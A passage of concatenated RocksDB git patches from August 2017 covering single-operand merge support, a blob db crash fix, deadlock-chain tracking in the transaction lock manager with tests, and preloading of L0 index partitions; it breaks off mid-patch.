class MergeOperator { // no checking is enforced. Client is responsible for providing // consistent MergeOperator between DB opens. virtual const char* Name() const = 0; + + // Determines whether the MergeOperator can be called with just a single + // merge operand. + // Override and return true for allowing a single operand. FullMergeV2 and + // PartialMerge/PartialMergeMulti should be implemented accordingly to handle + // a single operand. + virtual bool AllowSingleOperand() const { return false; } }; // The simpler, associative merge operator. From 8f2598ac9d730bf0a7c08b9cdb6071fd7b73ba3b Mon Sep 17 00:00:00 2001 From: Sagar Vemuri Date: Thu, 17 Aug 2017 14:42:54 -0700 Subject: [PATCH 124/205] Enable Cassandra merge operator to be called with a single merge operand Summary: Updating Cassandra merge operator to make use of a single merge operand when needed. Single merge operand support has been introduced in #2721. Closes https://github.com/facebook/rocksdb/pull/2753 Differential Revision: D5652867 Pulled By: sagar0 fbshipit-source-id: b9fbd3196d3ebd0b752626dbf9bec9aa53e3e26a --- utilities/cassandra/merge_operator.h | 2 ++ 1 file changed, 2 insertions(+) diff --git a/utilities/cassandra/merge_operator.h b/utilities/cassandra/merge_operator.h index 679474075e5..28066ca0591 100644 --- a/utilities/cassandra/merge_operator.h +++ b/utilities/cassandra/merge_operator.h @@ -26,6 +26,8 @@ class CassandraValueMergeOperator : public MergeOperator { Logger* logger) const override; virtual const char* Name() const override; + + virtual bool AllowSingleOperand() const override { return true; } }; } // namespace cassandra } // namespace rocksdb From 29877ec7b44b41a37a0766035a2ebe07bf56f663 Mon Sep 17 00:00:00 2001 From: yiwu-arbug Date: Thu, 17 Aug 2017 14:47:17 -0700 Subject: [PATCH 125/205] Fix blob db crash during calculating write amp Summary: On initial call to BlobDBImpl::WaStats() `all_periods_write_` would be empty, so it will crash when we call pop_front() at line 1627. Apparently it is mean to pop only when `all_periods_write_.size() > kWriteAmplificationStatsPeriods`. The whole write amp calculation doesn't seems to be correct and it is not being exposed. Will work on it later. Test Plan Change kWriteAmplificationStatsPeriodMillisecs to 1000 (1 second) and run db_bench --use_blob_db for 5 minutes. Closes https://github.com/facebook/rocksdb/pull/2751 Differential Revision: D5648269 Pulled By: yiwu-arbug fbshipit-source-id: b843d9a09bb5f9e1b713d101ec7b87e54b5115a4 --- utilities/blob_db/blob_db_impl.cc | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/utilities/blob_db/blob_db_impl.cc b/utilities/blob_db/blob_db_impl.cc index 06350b896e3..bbae53c0ebb 100644 --- a/utilities/blob_db/blob_db_impl.cc +++ b/utilities/blob_db/blob_db_impl.cc @@ -1615,12 +1615,13 @@ std::pair BlobDBImpl::ReclaimOpenFiles(bool aborted) { return std::make_pair(true, -1); } +// TODO(yiwu): correct the stats and expose it. std::pair BlobDBImpl::WaStats(bool aborted) { if (aborted) return std::make_pair(false, -1); WriteLock wl(&mutex_); - if (all_periods_write_.size() < kWriteAmplificationStatsPeriods) { + if (all_periods_write_.size() >= kWriteAmplificationStatsPeriods) { total_periods_write_ -= (*all_periods_write_.begin()); total_periods_ampl_ = (*all_periods_ampl_.begin()); From c1384a707637187be3b65386816078270b8943f6 Mon Sep 17 00:00:00 2001 From: yiwu-arbug Date: Thu, 17 Aug 2017 17:53:45 -0700 Subject: [PATCH 126/205] fix db_stress uint64_t to int32 cast Summary: Clang complain about an cast from uint64_t to int32 in db_stress. Fixing it. Closes https://github.com/facebook/rocksdb/pull/2755 Differential Revision: D5655947 Pulled By: yiwu-arbug fbshipit-source-id: cfac10e796e0adfef4727090b50975b0d6e2c9be --- tools/db_stress.cc | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/tools/db_stress.cc b/tools/db_stress.cc index 7a4837f18e6..86776cf9737 100644 --- a/tools/db_stress.cc +++ b/tools/db_stress.cc @@ -328,7 +328,7 @@ extern std::vector rocksdb_kill_prefix_blacklist; DEFINE_bool(disable_wal, false, "If true, do not write WAL for write."); -DEFINE_int32(target_file_size_base, rocksdb::Options().target_file_size_base, +DEFINE_int64(target_file_size_base, rocksdb::Options().target_file_size_base, "Target level-1 file size for compaction"); DEFINE_int32(target_file_size_multiplier, 1, From bddd5d3630694a6abecec02050d7d5bf55189c64 Mon Sep 17 00:00:00 2001 From: Archit Mishra Date: Thu, 17 Aug 2017 18:49:30 -0700 Subject: [PATCH 127/205] Added mechanism to track deadlock chain Summary: Changes: * extended the wait_txn_map to track additional information * designed circular buffer to store n latest deadlocks' information * added test coverage to verify the additional information tracked is accurately stored in the buffer Closes https://github.com/facebook/rocksdb/pull/2630 Differential Revision: D5478025 Pulled By: armishra fbshipit-source-id: 2b138de7b5a73f5ca554fc3ff8220a3be49f39e7 --- include/rocksdb/utilities/transaction_db.h | 27 +++ .../pessimistic_transaction_db.cc | 10 ++ .../transactions/pessimistic_transaction_db.h | 4 + .../transactions/transaction_lock_mgr.cc | 101 ++++++++++- utilities/transactions/transaction_lock_mgr.h | 33 +++- utilities/transactions/transaction_test.cc | 167 +++++++++++++++++- 6 files changed, 329 insertions(+), 13 deletions(-) diff --git a/include/rocksdb/utilities/transaction_db.h b/include/rocksdb/utilities/transaction_db.h index a61234adcc2..7a592c4f6cf 100644 --- a/include/rocksdb/utilities/transaction_db.h +++ b/include/rocksdb/utilities/transaction_db.h @@ -29,6 +29,8 @@ enum TxnDBWritePolicy { WRITE_UNPREPARED // write data before the prepare phase of 2pc }; +const uint32_t kInitialMaxDeadlocks = 5; + struct TransactionDBOptions { // Specifies the maximum number of keys that can be locked at the same time // per column family. @@ -37,6 +39,9 @@ struct TransactionDBOptions { // If this value is not positive, no limit will be enforced. int64_t max_num_locks = -1; + // Stores the number of latest deadlocks to track + uint32_t max_num_deadlocks = kInitialMaxDeadlocks; + // Increasing this value will increase the concurrency by dividing the lock // table (per column family) into more sub-tables, each with their own // separate @@ -123,6 +128,26 @@ struct KeyLockInfo { bool exclusive; }; +struct DeadlockInfo { + TransactionID m_txn_id; + uint32_t m_cf_id; + std::string m_waiting_key; + bool m_exclusive; +}; + +struct DeadlockPath { + std::vector path; + bool limit_exceeded; + + explicit DeadlockPath(std::vector path_entry) + : path(path_entry), limit_exceeded(false) {} + + // empty path, limit exceeded constructor and default constructor + explicit DeadlockPath(bool limit = false) : path(0), limit_exceeded(limit) {} + + bool empty() { return path.empty() && !limit_exceeded; } +}; + class TransactionDB : public StackableDB { public: // Open a TransactionDB similar to DB::Open(). @@ -181,6 +206,8 @@ class TransactionDB : public StackableDB { // The mapping is column family id -> KeyLockInfo virtual std::unordered_multimap GetLockStatusData() = 0; + virtual std::vector GetDeadlockInfoBuffer() = 0; + virtual void SetDeadlockInfoBufferSize(uint32_t target_size) = 0; protected: // To Create an TransactionDB, call Open() diff --git a/utilities/transactions/pessimistic_transaction_db.cc b/utilities/transactions/pessimistic_transaction_db.cc index 08b0dfa7ba4..5304340543a 100644 --- a/utilities/transactions/pessimistic_transaction_db.cc +++ b/utilities/transactions/pessimistic_transaction_db.cc @@ -28,6 +28,7 @@ PessimisticTransactionDB::PessimisticTransactionDB( db_impl_(static_cast_with_check(db)), txn_db_options_(txn_db_options), lock_mgr_(this, txn_db_options_.num_stripes, txn_db_options.max_num_locks, + txn_db_options_.max_num_deadlocks, txn_db_options_.custom_mutex_factory ? txn_db_options_.custom_mutex_factory : std::shared_ptr( @@ -57,6 +58,7 @@ PessimisticTransactionDB::PessimisticTransactionDB( db_impl_(static_cast_with_check(db->GetRootDB())), txn_db_options_(txn_db_options), lock_mgr_(this, txn_db_options_.num_stripes, txn_db_options.max_num_locks, + txn_db_options_.max_num_deadlocks, txn_db_options_.custom_mutex_factory ? txn_db_options_.custom_mutex_factory : std::shared_ptr( @@ -486,6 +488,14 @@ PessimisticTransactionDB::GetLockStatusData() { return lock_mgr_.GetLockStatusData(); } +std::vector PessimisticTransactionDB::GetDeadlockInfoBuffer() { + return lock_mgr_.GetDeadlockInfoBuffer(); +} + +void PessimisticTransactionDB::SetDeadlockInfoBufferSize(uint32_t target_size) { + lock_mgr_.Resize(target_size); +} + void PessimisticTransactionDB::RegisterTransaction(Transaction* txn) { assert(txn); assert(txn->GetName().length() > 0); diff --git a/utilities/transactions/pessimistic_transaction_db.h b/utilities/transactions/pessimistic_transaction_db.h index 35c2a014330..4d1a5f4b511 100644 --- a/utilities/transactions/pessimistic_transaction_db.h +++ b/utilities/transactions/pessimistic_transaction_db.h @@ -100,6 +100,10 @@ class PessimisticTransactionDB : public TransactionDB { void GetAllPreparedTransactions(std::vector* trans) override; TransactionLockMgr::LockStatusData GetLockStatusData() override; + + std::vector GetDeadlockInfoBuffer() override; + void SetDeadlockInfoBufferSize(uint32_t target_size) override; + struct CommitEntry { uint64_t prep_seq; uint64_t commit_seq; diff --git a/utilities/transactions/transaction_lock_mgr.cc b/utilities/transactions/transaction_lock_mgr.cc index 9b7a4e640d9..a72c2a12ffb 100644 --- a/utilities/transactions/transaction_lock_mgr.cc +++ b/utilities/transactions/transaction_lock_mgr.cc @@ -96,6 +96,64 @@ struct LockMap { size_t GetStripe(const std::string& key) const; }; +void DeadlockInfoBuffer::AddNewPath(DeadlockPath path) { + std::lock_guard lock(paths_buffer_mutex_); + + if (paths_buffer_.empty()) { + return; + } + + paths_buffer_[buffer_idx_] = path; + buffer_idx_ = (buffer_idx_ + 1) % paths_buffer_.size(); +} + +void DeadlockInfoBuffer::Resize(uint32_t target_size) { + std::lock_guard lock(paths_buffer_mutex_); + + paths_buffer_ = Normalize(); + + // Drop the deadlocks that will no longer be needed ater the normalize + if (target_size < paths_buffer_.size()) { + paths_buffer_.erase( + paths_buffer_.begin(), + paths_buffer_.begin() + (paths_buffer_.size() - target_size)); + buffer_idx_ = 0; + } + // Resize the buffer to the target size and restore the buffer's idx + else { + auto prev_size = paths_buffer_.size(); + paths_buffer_.resize(target_size); + buffer_idx_ = (uint32_t)prev_size; + } +} + +std::vector DeadlockInfoBuffer::Normalize() { + auto working = paths_buffer_; + + if (working.empty()) { + return working; + } + + // Next write occurs at a nonexistent path's slot + if (paths_buffer_[buffer_idx_].empty()) { + working.resize(buffer_idx_); + } else { + std::rotate(working.begin(), working.begin() + buffer_idx_, working.end()); + } + + return working; +} + +std::vector DeadlockInfoBuffer::PrepareBuffer() { + std::lock_guard lock(paths_buffer_mutex_); + + // Reversing the normalized vector returns the latest deadlocks first + auto working = Normalize(); + std::reverse(working.begin(), working.end()); + + return working; +} + namespace { void UnrefLockMapsCache(void* ptr) { // Called when a thread exits or a ThreadLocalPtr gets destroyed. @@ -107,11 +165,13 @@ void UnrefLockMapsCache(void* ptr) { TransactionLockMgr::TransactionLockMgr( TransactionDB* txn_db, size_t default_num_stripes, int64_t max_num_locks, + uint32_t max_num_deadlocks, std::shared_ptr mutex_factory) : txn_db_impl_(nullptr), default_num_stripes_(default_num_stripes), max_num_locks_(max_num_locks), lock_maps_cache_(new ThreadLocalPtr(&UnrefLockMapsCache)), + dlock_buffer_(max_num_deadlocks), mutex_factory_(mutex_factory) { assert(txn_db); txn_db_impl_ = @@ -309,7 +369,8 @@ Status TransactionLockMgr::AcquireWithTimeout( // detection. if (wait_ids.size() != 0) { if (txn->IsDeadlockDetect()) { - if (IncrementWaiters(txn, wait_ids)) { + if (IncrementWaiters(txn, wait_ids, key, column_family_id, + lock_info.exclusive)) { result = Status::Busy(Status::SubCode::kDeadlock); stripe->stripe_mutex->UnLock(); return result; @@ -380,12 +441,15 @@ void TransactionLockMgr::DecrementWaitersImpl( bool TransactionLockMgr::IncrementWaiters( const PessimisticTransaction* txn, - const autovector& wait_ids) { + const autovector& wait_ids, const std::string& key, + const uint32_t& cf_id, const bool& exclusive) { auto id = txn->GetID(); - std::vector queue(txn->GetDeadlockDetectDepth()); + std::vector queue_parents(txn->GetDeadlockDetectDepth()); + std::vector queue_values(txn->GetDeadlockDetectDepth()); std::lock_guard lock(wait_txn_map_mutex_); assert(!wait_txn_map_.Contains(id)); - wait_txn_map_.Insert(id, wait_ids); + + wait_txn_map_.Insert(id, {wait_ids, cf_id, key, exclusive}); for (auto wait_id : wait_ids) { if (rev_wait_txn_map_.Contains(wait_id)) { @@ -401,13 +465,15 @@ bool TransactionLockMgr::IncrementWaiters( } const auto* next_ids = &wait_ids; + int parent = -1; for (int tail = 0, head = 0; head < txn->GetDeadlockDetectDepth(); head++) { int i = 0; if (next_ids) { for (; i < static_cast(next_ids->size()) && tail + i < txn->GetDeadlockDetectDepth(); i++) { - queue[tail + i] = (*next_ids)[i]; + queue_values[tail + i] = (*next_ids)[i]; + queue_parents[tail + i] = parent; } tail += i; } @@ -417,19 +483,33 @@ bool TransactionLockMgr::IncrementWaiters( return false; } - auto next = queue[head]; + auto next = queue_values[head]; if (next == id) { + std::vector path; + while (head != -1) { + assert(wait_txn_map_.Contains(queue_values[head])); + + auto extracted_info = wait_txn_map_.Get(queue_values[head]); + path.push_back({queue_values[head], extracted_info.m_cf_id, + extracted_info.m_waiting_key, + extracted_info.m_exclusive}); + head = queue_parents[head]; + } + std::reverse(path.begin(), path.end()); + dlock_buffer_.AddNewPath(DeadlockPath(path)); DecrementWaitersImpl(txn, wait_ids); return true; } else if (!wait_txn_map_.Contains(next)) { next_ids = nullptr; continue; } else { - next_ids = &wait_txn_map_.Get(next); + parent = head; + next_ids = &(wait_txn_map_.Get(next).m_neighbors); } } // Wait cycle too big, just assume deadlock. + dlock_buffer_.AddNewPath(DeadlockPath(true)); DecrementWaitersImpl(txn, wait_ids); return true; } @@ -650,6 +730,13 @@ TransactionLockMgr::LockStatusData TransactionLockMgr::GetLockStatusData() { return data; } +std::vector TransactionLockMgr::GetDeadlockInfoBuffer() { + return dlock_buffer_.PrepareBuffer(); +} + +void TransactionLockMgr::Resize(uint32_t target_size) { + dlock_buffer_.Resize(target_size); +} } // namespace rocksdb #endif // ROCKSDB_LITE diff --git a/utilities/transactions/transaction_lock_mgr.h b/utilities/transactions/transaction_lock_mgr.h index 6e542071c15..abf7c5d3d71 100644 --- a/utilities/transactions/transaction_lock_mgr.h +++ b/utilities/transactions/transaction_lock_mgr.h @@ -26,13 +26,35 @@ struct LockInfo; struct LockMap; struct LockMapStripe; +struct DeadlockInfoBuffer { + private: + std::vector paths_buffer_; + uint32_t buffer_idx_; + std::mutex paths_buffer_mutex_; + std::vector Normalize(); + + public: + explicit DeadlockInfoBuffer(uint32_t n_latest_dlocks) + : paths_buffer_(n_latest_dlocks), buffer_idx_(0) {} + void AddNewPath(DeadlockPath path); + void Resize(uint32_t target_size); + std::vector PrepareBuffer(); +}; + +struct TrackedTrxInfo { + autovector m_neighbors; + uint32_t m_cf_id; + std::string m_waiting_key; + bool m_exclusive; +}; + class Slice; class PessimisticTransactionDB; class TransactionLockMgr { public: TransactionLockMgr(TransactionDB* txn_db, size_t default_num_stripes, - int64_t max_num_locks, + int64_t max_num_locks, uint32_t max_num_deadlocks, std::shared_ptr factory); ~TransactionLockMgr(); @@ -59,6 +81,8 @@ class TransactionLockMgr { using LockStatusData = std::unordered_multimap; LockStatusData GetLockStatusData(); + std::vector GetDeadlockInfoBuffer(); + void Resize(uint32_t); private: PessimisticTransactionDB* txn_db_impl_; @@ -92,7 +116,8 @@ class TransactionLockMgr { // Maps from waitee -> number of waiters. HashMap rev_wait_txn_map_; // Maps from waiter -> waitee. - HashMap> wait_txn_map_; + HashMap wait_txn_map_; + DeadlockInfoBuffer dlock_buffer_; // Used to allocate mutexes/condvars to use when locking keys std::shared_ptr mutex_factory_; @@ -116,7 +141,9 @@ class TransactionLockMgr { LockMapStripe* stripe, LockMap* lock_map, Env* env); bool IncrementWaiters(const PessimisticTransaction* txn, - const autovector& wait_ids); + const autovector& wait_ids, + const std::string& key, const uint32_t& cf_id, + const bool& exclusive); void DecrementWaiters(const PessimisticTransaction* txn, const autovector& wait_ids); void DecrementWaitersImpl(const PessimisticTransaction* txn, diff --git a/utilities/transactions/transaction_test.cc b/utilities/transactions/transaction_test.cc index 148f1c41c24..0eaaf20acb6 100644 --- a/utilities/transactions/transaction_test.cc +++ b/utilities/transactions/transaction_test.cc @@ -462,6 +462,37 @@ TEST_P(TransactionTest, DeadlockCycleShared) { auto s = txns[i]->GetForUpdate(read_options, "0", nullptr, true /* exclusive */); ASSERT_TRUE(s.IsDeadlock()); + + // Calculate next buffer len, plateau at 5 when 5 records are inserted. + const uint32_t curr_dlock_buffer_len_ = + (i - 14 > kInitialMaxDeadlocks) ? kInitialMaxDeadlocks : (i - 14); + + auto dlock_buffer = db->GetDeadlockInfoBuffer(); + ASSERT_EQ(dlock_buffer.size(), curr_dlock_buffer_len_); + auto dlock_entry = dlock_buffer[0].path; + ASSERT_EQ(dlock_entry.size(), kInitialMaxDeadlocks); + + int64_t curr_waiting_key = 0; + + // Offset of each txn id from the root of the shared dlock tree's txn id. + int64_t offset_root = dlock_entry[0].m_txn_id - 1; + // Offset of the final entry in the dlock path from the root's txn id. + TransactionID leaf_id = + dlock_entry[dlock_entry.size() - 1].m_txn_id - offset_root; + + for (auto it = dlock_entry.rbegin(); it != dlock_entry.rend(); it++) { + auto dl_node = *it; + ASSERT_EQ(dl_node.m_txn_id, offset_root + leaf_id); + ASSERT_EQ(dl_node.m_cf_id, 0); + ASSERT_EQ(dl_node.m_waiting_key, ToString(curr_waiting_key)); + ASSERT_EQ(dl_node.m_exclusive, true); + + if (curr_waiting_key == 0) { + curr_waiting_key = leaf_id; + } + curr_waiting_key /= 2; + leaf_id /= 2; + } } // Rollback the leaf transaction. @@ -473,6 +504,102 @@ TEST_P(TransactionTest, DeadlockCycleShared) { for (auto& t : threads) { t.join(); } + + // Downsize the buffer and verify the 3 latest deadlocks are preserved. + auto dlock_buffer_before_resize = db->GetDeadlockInfoBuffer(); + db->SetDeadlockInfoBufferSize(3); + auto dlock_buffer_after_resize = db->GetDeadlockInfoBuffer(); + ASSERT_EQ(dlock_buffer_after_resize.size(), 3); + + for (uint32_t i = 0; i < dlock_buffer_after_resize.size(); i++) { + for (uint32_t j = 0; j < dlock_buffer_after_resize[i].path.size(); j++) { + ASSERT_EQ(dlock_buffer_after_resize[i].path[j].m_txn_id, + dlock_buffer_before_resize[i].path[j].m_txn_id); + } + } + + // Upsize the buffer and verify the 3 latest dealocks are preserved. + dlock_buffer_before_resize = db->GetDeadlockInfoBuffer(); + db->SetDeadlockInfoBufferSize(5); + dlock_buffer_after_resize = db->GetDeadlockInfoBuffer(); + ASSERT_EQ(dlock_buffer_after_resize.size(), 3); + + for (uint32_t i = 0; i < dlock_buffer_before_resize.size(); i++) { + for (uint32_t j = 0; j < dlock_buffer_before_resize[i].path.size(); j++) { + ASSERT_EQ(dlock_buffer_after_resize[i].path[j].m_txn_id, + dlock_buffer_before_resize[i].path[j].m_txn_id); + } + } + + // Downsize to 0 and verify the size is consistent. + dlock_buffer_before_resize = db->GetDeadlockInfoBuffer(); + db->SetDeadlockInfoBufferSize(0); + dlock_buffer_after_resize = db->GetDeadlockInfoBuffer(); + ASSERT_EQ(dlock_buffer_after_resize.size(), 0); + + // Upsize from 0 to verify the size is persistent. + dlock_buffer_before_resize = db->GetDeadlockInfoBuffer(); + db->SetDeadlockInfoBufferSize(3); + dlock_buffer_after_resize = db->GetDeadlockInfoBuffer(); + ASSERT_EQ(dlock_buffer_after_resize.size(), 0); + + // Contrived case of shared lock of cycle size 2 to verify that a shared + // lock causing a deadlock is correctly reported as "shared" in the buffer. + std::vector txns_shared(2); + + // Create a cycle of size 2. + for (uint32_t i = 0; i < 2; i++) { + txns_shared[i] = db->BeginTransaction(write_options, txn_options); + ASSERT_TRUE(txns_shared[i]); + auto s = txns_shared[i]->GetForUpdate(read_options, ToString(i), nullptr); + ASSERT_OK(s); + } + + std::atomic checkpoints_shared(0); + rocksdb::SyncPoint::GetInstance()->SetCallBack( + "TransactionLockMgr::AcquireWithTimeout:WaitingTxn", + [&](void* arg) { checkpoints_shared.fetch_add(1); }); + rocksdb::SyncPoint::GetInstance()->EnableProcessing(); + + std::vector threads_shared; + for (uint32_t i = 0; i < 1; i++) { + std::function blocking_thread = [&, i] { + auto s = + txns_shared[i]->GetForUpdate(read_options, ToString(i + 1), nullptr); + ASSERT_OK(s); + txns_shared[i]->Rollback(); + delete txns_shared[i]; + }; + threads_shared.emplace_back(blocking_thread); + } + + // Wait until all threads are waiting on each other. + while (checkpoints_shared.load() != 1) { + /* sleep override */ + std::this_thread::sleep_for(std::chrono::milliseconds(100)); + } + rocksdb::SyncPoint::GetInstance()->DisableProcessing(); + rocksdb::SyncPoint::GetInstance()->ClearAllCallBacks(); + + // Complete the cycle T2 -> T1 with a shared lock. + auto s = txns_shared[1]->GetForUpdate(read_options, "0", nullptr, false); + ASSERT_TRUE(s.IsDeadlock()); + + auto dlock_buffer = db->GetDeadlockInfoBuffer(); + + // Verify the size of the buffer and the single path. + ASSERT_EQ(dlock_buffer.size(), 1); + ASSERT_EQ(dlock_buffer[0].path.size(), 2); + + // Verify the exclusivity field of the transactions in the deadlock path. + ASSERT_TRUE(dlock_buffer[0].path[0].m_exclusive); + ASSERT_FALSE(dlock_buffer[0].path[1].m_exclusive); + txns_shared[1]->Rollback(); + delete txns_shared[1]; + + for (auto& t : threads_shared) { + t.join(); + } } TEST_P(TransactionTest, DeadlockCycle) { @@ -480,7 +607,8 @@ TEST_P(TransactionTest, DeadlockCycle) { ReadOptions read_options; TransactionOptions txn_options; - const uint32_t kMaxCycleLength = 50; + // offset by 2 from the max depth to test edge case + const uint32_t kMaxCycleLength = 52; txn_options.lock_timeout = 1000000; txn_options.deadlock_detect = true; @@ -489,6 +617,7 @@ TEST_P(TransactionTest, DeadlockCycle) { // Set up a long wait for chain like this: // // T1 -> T2 -> T3 -> ... -> Tlen + std::vector txns(len); for (uint32_t i = 0; i < len; i++) { @@ -509,8 +638,7 @@ TEST_P(TransactionTest, DeadlockCycle) { std::vector threads; for (uint32_t i = 0; i < len - 1; i++) { std::function blocking_thread = [&, i] { - auto s = - txns[i]->GetForUpdate(read_options, ToString(i + 1), nullptr); + auto s = txns[i]->GetForUpdate(read_options, ToString(i + 1), nullptr); ASSERT_OK(s); txns[i]->Rollback(); delete txns[i]; @@ -530,6 +658,39 @@ TEST_P(TransactionTest, DeadlockCycle) { auto s = txns[len - 1]->GetForUpdate(read_options, "0", nullptr); ASSERT_TRUE(s.IsDeadlock()); + const uint32_t dlock_buffer_size_ = (len - 1 > 5) ? 5 : (len - 1); + uint32_t curr_waiting_key = 0; + TransactionID curr_txn_id = txns[0]->GetID(); + + auto dlock_buffer = db->GetDeadlockInfoBuffer(); + ASSERT_EQ(dlock_buffer.size(), dlock_buffer_size_); + uint32_t check_len = len; + bool check_limit_flag = false; + + // Special case for a deadlock path that exceeds the maximum depth. + if (len > 50) { + check_len = 0; + check_limit_flag = true; + } + auto dlock_entry = dlock_buffer[0].path; + ASSERT_EQ(dlock_entry.size(), check_len); + ASSERT_EQ(dlock_buffer[0].limit_exceeded, check_limit_flag); + + // Iterates backwards over path verifying decreasing txn_ids. + for (auto it = dlock_entry.rbegin(); it != dlock_entry.rend(); it++) { + auto dl_node = *it; + ASSERT_EQ(dl_node.m_txn_id, len + curr_txn_id - 1); + ASSERT_EQ(dl_node.m_cf_id, 0); + ASSERT_EQ(dl_node.m_waiting_key, ToString(curr_waiting_key)); + ASSERT_EQ(dl_node.m_exclusive, true); + + curr_txn_id--; + if (curr_waiting_key == 0) { + curr_waiting_key = len; + } + curr_waiting_key--; + } + // Rollback the last transaction. txns[len - 1]->Rollback(); delete txns[len - 1]; From 1efc600ddfa4a8bf4cf042343d7a20199dfd76e5 Mon Sep 17 00:00:00 2001 From: Maysam Yabandeh Date: Fri, 18 Aug 2017 10:53:03 -0700 Subject: [PATCH 128/205] Preload l0 index partitions Summary: This fixes the existing logic for pinning l0 index partitions. The patch preloads the partitions into block cache and pin them if they belong to level 0 and pin_l0 is set. The drawback is that it does many small IOs when preloading all the partitions into the cache is direct io is enabled. Working for a solution for that. Closes https://github.com/facebook/rocksdb/pull/2661 Differential Revision: D5554010 Pulled By: maysamyabandeh fbshipit-source-id: 1e6f32a3524d71355c77d4138516dcfb601ca7b2 --- HISTORY.md | 2 + include/rocksdb/version.h | 2 +- table/block_based_table_reader.cc | 174 +++++++++++++++++++----------- table/block_based_table_reader.h | 18 ++-- table/table_test.cc | 2 +- 5 files changed, 128 insertions(+), 70 deletions(-) diff --git a/HISTORY.md b/HISTORY.md index fc6c55874db..a07337055ab 100644 --- a/HISTORY.md +++ b/HISTORY.md @@ -1,5 +1,7 @@ # Rocksdb Change Log ## Unreleased + +## 5.7.8 (08/14/2017) ### New Features * Add Iterator::Refresh(), which allows users to update the iterator state so that they can avoid some initialization costs of recreating iterators. * Replace dynamic_cast<> (except unit test) so people can choose to build with RTTI off. With make, release mode is by default built with -fno-rtti and debug mode is built without it. Users can override it by setting USE_RTTI=0 or 1. diff --git a/include/rocksdb/version.h b/include/rocksdb/version.h index fb920cf2e7e..dd11ea7e8e5 100644 --- a/include/rocksdb/version.h +++ b/include/rocksdb/version.h @@ -5,7 +5,7 @@ #pragma once #define ROCKSDB_MAJOR 5 -#define ROCKSDB_MINOR 7 +#define ROCKSDB_MINOR 8 #define ROCKSDB_PATCH 0 // Do not use these. We made the mistake of declaring macros starting with diff --git a/table/block_based_table_reader.cc b/table/block_based_table_reader.cc index 89e0c735490..7e236e8bfff 100644 --- a/table/block_based_table_reader.cc +++ b/table/block_based_table_reader.cc @@ -186,23 +186,87 @@ class PartitionIndexReader : public IndexReader, public Cleanable { // Filters are already checked before seeking the index const bool skip_filters = true; const bool is_index = true; - Cleanable* block_cache_cleaner = nullptr; - const bool pin_cached_indexes = - level_ == 0 && - table_->rep_->table_options.pin_l0_filter_and_index_blocks_in_cache; - if (pin_cached_indexes) { - // Keep partition indexes into the cache as long as the partition index - // reader object is alive - block_cache_cleaner = this; - } return NewTwoLevelIterator( new BlockBasedTable::BlockEntryIteratorState( table_, ReadOptions(), icomparator_, skip_filters, is_index, - block_cache_cleaner), + partition_map_.size() ? &partition_map_ : nullptr), index_block_->NewIterator(icomparator_, nullptr, true)); // TODO(myabandeh): Update TwoLevelIterator to be able to make use of - // on-stack - // BlockIter while the state is on heap + // on-stack BlockIter while the state is on heap. Currentlly it assumes + // the first level iter is always on heap and will attempt to delete it + // in its destructor. + } + + virtual void CacheDependencies(bool pin) override { + // Before read partitions, prefetch them to avoid lots of IOs + auto rep = table_->rep_; + BlockIter biter; + BlockHandle handle; + index_block_->NewIterator(icomparator_, &biter, true); + // Index partitions are assumed to be consecuitive. Prefetch them all. + // Read the first block offset + biter.SeekToFirst(); + Slice input = biter.value(); + Status s = handle.DecodeFrom(&input); + assert(s.ok()); + if (!s.ok()) { + ROCKS_LOG_WARN(rep->ioptions.info_log, + "Could not read first index partition"); + return; + } + uint64_t prefetch_off = handle.offset(); + + // Read the last block's offset + biter.SeekToLast(); + input = biter.value(); + s = handle.DecodeFrom(&input); + assert(s.ok()); + if (!s.ok()) { + ROCKS_LOG_WARN(rep->ioptions.info_log, + "Could not read last index partition"); + return; + } + uint64_t last_off = handle.offset() + handle.size() + kBlockTrailerSize; + uint64_t prefetch_len = last_off - prefetch_off; + std::unique_ptr prefetch_buffer; + auto& file = table_->rep_->file; + prefetch_buffer.reset(new FilePrefetchBuffer()); + s = prefetch_buffer->Prefetch(file.get(), prefetch_off, prefetch_len); + + // After prefetch, read the partitions one by one + biter.SeekToFirst(); + auto ro = ReadOptions(); + Cache* block_cache = rep->table_options.block_cache.get(); + for (; biter.Valid(); biter.Next()) { + input = biter.value(); + s = handle.DecodeFrom(&input); + assert(s.ok()); + if (!s.ok()) { + ROCKS_LOG_WARN(rep->ioptions.info_log, + "Could not read index partition"); + continue; + } + + BlockBasedTable::CachableEntry block; + Slice compression_dict; + if (rep->compression_dict_block) { + compression_dict = rep->compression_dict_block->data; + } + const bool is_index = true; + s = table_->MaybeLoadDataBlockToCache(prefetch_buffer.get(), rep, ro, + handle, compression_dict, &block, + is_index); + + if (s.ok() && block.value != nullptr) { + assert(block.cache_handle != nullptr); + if (pin) { + partition_map_[handle.offset()] = block; + RegisterCleanup(&ReleaseCachedEntry, block_cache, block.cache_handle); + } else { + block_cache->Release(block.cache_handle); + } + } + } } virtual size_t size() const override { return index_block_->size(); } @@ -222,13 +286,12 @@ class PartitionIndexReader : public IndexReader, public Cleanable { const int level) : IndexReader(icomparator, stats), table_(table), - index_block_(std::move(index_block)), - level_(level) { + index_block_(std::move(index_block)) { assert(index_block_ != nullptr); } BlockBasedTable* table_; std::unique_ptr index_block_; - int level_; + std::map> partition_map_; }; // Index that allows binary search lookup for the first key of each block. @@ -708,10 +771,9 @@ Status BlockBasedTable::Open(const ImmutableCFOptions& ioptions, } else { if (found_range_del_block && !rep->range_del_handle.IsNull()) { ReadOptions read_options; - // TODO: try to use prefetched buffer too. - s = MaybeLoadDataBlockToCache(rep, read_options, rep->range_del_handle, - Slice() /* compression_dict */, - &rep->range_del_entry); + s = MaybeLoadDataBlockToCache( + prefetch_buffer.get(), rep, read_options, rep->range_del_handle, + Slice() /* compression_dict */, &rep->range_del_entry); if (!s.ok()) { ROCKS_LOG_WARN( rep->ioptions.info_log, @@ -740,21 +802,22 @@ Status BlockBasedTable::Open(const ImmutableCFOptions& ioptions, // Always prefetch index and filter for level 0 if (table_options.cache_index_and_filter_blocks) { if (prefetch_index_and_filter_in_cache || level == 0) { + const bool pin = + rep->table_options.pin_l0_filter_and_index_blocks_in_cache && + level == 0; assert(table_options.block_cache != nullptr); // Hack: Call NewIndexIterator() to implicitly add index to the // block_cache - // if pin_l0_filter_and_index_blocks_in_cache is true and this is - // a level0 file, then we will pass in this pointer to rep->index - // to NewIndexIterator(), which will save the index block in there - // else it's a nullptr and nothing special happens - CachableEntry* index_entry = nullptr; - if 